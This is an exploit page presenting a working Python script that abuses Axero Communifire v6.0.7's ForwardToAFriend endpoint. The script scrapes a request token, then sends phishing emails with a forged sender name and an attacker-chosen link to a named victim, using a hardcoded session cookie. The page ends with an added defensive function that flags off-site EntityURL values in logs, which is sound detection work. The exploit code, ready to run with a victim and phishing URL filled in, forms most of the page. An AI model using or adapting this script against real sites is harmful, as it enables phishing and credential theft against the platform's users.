Phishing through Axero Communifire v6.0.7


Disclaimer: All exploits linked to or published on Endure Secure’s website should never be used against an application without the explicit, written consent of someone who is authorised to approve security testing against that application. Exploits are published for educational purposes only.

Exploit Language: Python 3
Difficulty: Easy
Category: Web Apps
CVSS: 8.8
Source Code: GitHub Link

Overview

Coming Soon…

Exploit Code

#!/usr/bin/env python3
# Exploit Author: Matamorphosis
# Date: 2020-02-09
# CVSS Score: 8.8 - When publicly exposed.
# Category: Web Apps
# Version: Axero Communifire - Version 6.0.7178.7568
# Vendor Homepage: https://axerosolutions.com/
# Tested on: Windows and Ubuntu 19.10
# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

import requests, re, argparse
Parser = argparse.ArgumentParser(description="Communifire Exploit.")
Parser.add_argument('-tn', '--targetname', required=True, type=str, help='The name of your target / the victim.')
Parser.add_argument('-te', '--targetemail', required=True, type=str, help='The email address of your target / the victim.')
Parser.add_argument('-pu', '--phishingurl', required=True, type=str, help='The URL you wish the target / victim to navigate to.')
Parser.add_argument('-sn', '--sendername', required=True, type=str, help='The name you wish to specify of who the email is coming from.')
Parser.add_argument('-d', '--domain', required=True, type=str, help='The domain of the target Axero web application.')
Parser.add_argument('-wp', '--wikipage', required=True, type=str, help='The full url of any wiki page as part of the target Axero web application.')
Parser.add_argument('-cm', '--custommessage', required=False, type=str, help='Use this option to change the message sent to the victim if you choose.')
Arguments = Parser.parse_args()

# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# --- Set and filter variables. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Domain = Arguments.domain.replace('https://', '').replace('http://', '')

if '/' in Domain:
	Domain = Domain[:Domain.find("/")]
	
Phish_URL = f'https://{Domain}/webServices/CommonWebService.asmx/ForwardToAFriend?locale=en-US'
headers = {"X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json; charset=utf-8", "RequestVerificationToken": ""}

if Arguments.custommessage:
	data = {"invitation": {"SpaceID": 2, "FriendName": Arguments.targetname, "FriendEmail": Arguments.targetemail, "EntityURL": Arguments.phishingurl, "SenderName": Arguments.sendername, "TextMessage": Arguments.custommessage, "EntityID": 521, "EntityType": 9}}

else:
	data = {"invitation": {"SpaceID": 2, "FriendName": Arguments.targetname, "FriendEmail": Arguments.targetemail, "EntityURL": Arguments.phishingurl, "SenderName": Arguments.sendername, "TextMessage": "Open this super secure link", "EntityID": 521, "EntityType": 9}}

cookies = {"cf_space_wiki_sidebar_toggle": "visible", "Communifire_UserCulture": "en-US", ".ASPXAUTH": "98D63CAB01B9E68DAADBED8CB704D439D003BD2ED802352CA4599E3B04B358966A5E1457CE0A6A7A708FC681A021D72AF2F408B4E6E12190C8B72FBCF91AB6CC0F892C9583DF4FC4823173773D6FAB8367DA0E909901E4FD50ABA8FB48EFB1B3EF98031431AF3A2743D59D28E32DC24A8E3277BFFB12BA094831E03C5DC1E43E", "CF-Guest": "dde980c9-63e1-41eb-8c80-2fabb766895d", "Communifire_ClientTimeZoneOffset": "-600"} # Manually set this if required.

# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# --- The below request is made to obtain the request token needed to send the phishing email. ---------------------------------------------------------------------------------------------------------

print("[i] Attempting to obtain request token.")
Wiki_Page_Response = requests.get(Arguments.wikipage, cookies=cookies,).text
Request_Token_Regex = re.search(r'CF\_REQUEST\_TOKEN\s\=\s\'([\:\;\_\-\d\w]+)\'\,', Wiki_Page_Response)

# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# --- The below request sends the phishing email. ------------------------------------------------------------------------------------------------------------------------------------------------------

if Request_Token_Regex:
	print(f"[+] Successfully obtained a request token: {Request_Token_Regex.group(1)}.")
	headers['RequestVerificationToken'] = Request_Token_Regex.group(1)
	response = requests.post(Phish_URL, headers=headers, cookies=cookies, json=data)

	try:
		print("[+] Success." if response.json()["d"]["ResponseMessage"] == "You have successfully shared this content." else f"[-] Failed {response.text}.")

	except:
		print("[-] Failed.")

else:
	exit("[-] Failed to obtain a request token. Please ensure you provide a valid wiki page and supply cookies if authentication is required to execute the exploit.")

# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
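
The script above places a caller-chosen address in the EntityURL field of the ForwardToAFriend request, so a defender can review logged requests to that method and flag any EntityURL that does not point back at the site itself. The following is an added detection example, not part of the original exploit or of Axero's code; the function name, the sample requests, the hostnames, and the availability of request bodies in logs are assumptions.

```python
import json
from urllib.parse import urlsplit

# Path of the web-service method the script above posts to (compared case-insensitively).
FORWARD_PATH = "/webservices/commonwebservice.asmx/forwardtoafriend"


def check_forward_request(path, body, site_host):
    """Return findings for one logged POST; an empty list means nothing suspicious.

    site_host is the Communifire site's own hostname, supplied by the defender.
    """
    if urlsplit(path).path.lower() != FORWARD_PATH:
        return []  # some other endpoint, out of scope for this check
    try:
        entity_url = str(json.loads(body)["invitation"]["EntityURL"]).strip()
        parts = urlsplit(entity_url)
    except (ValueError, KeyError, TypeError):
        return ["malformed invitation body"]
    findings = []
    if parts.scheme.lower() not in ("http", "https"):
        findings.append(f"EntityURL scheme is not http(s): {entity_url!r}")
    if "\\" in entity_url:
        # Browsers treat '\' as '/', so the parsed host may not be the visited host.
        findings.append("EntityURL contains a backslash")
    # .hostname drops userinfo and port: 'https://site@other/' resolves to 'other'.
    host = (parts.hostname or "").lower()
    if host != site_host.lower():
        findings.append(f"EntityURL points off-site: {host!r}")
    return findings


# Constructed sample requests (not captured traffic); all hostnames are placeholders.
SAMPLE_PATH = "/webServices/CommonWebService.asmx/ForwardToAFriend?locale=en-US"
SAMPLES = [
    (SAMPLE_PATH, '{"invitation": {"EntityURL": "https://intranet.example.com/wiki/page", "EntityID": 521, "EntityType": 9}}'),
    (SAMPLE_PATH, '{"invitation": {"EntityURL": "https://login.example.net/reset", "EntityID": 521, "EntityType": 9}}'),
    (SAMPLE_PATH, '{"invitation": {"EntityURL": "https://intranet.example.com@login.example.net/", "EntityID": 521, "EntityType": 9}}'),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(check_forward_request(path, body, "intranet.example.com"))
```

The same host comparison can be applied wherever the request body is visible before the email is sent, for example in a reverse proxy rule in front of the application.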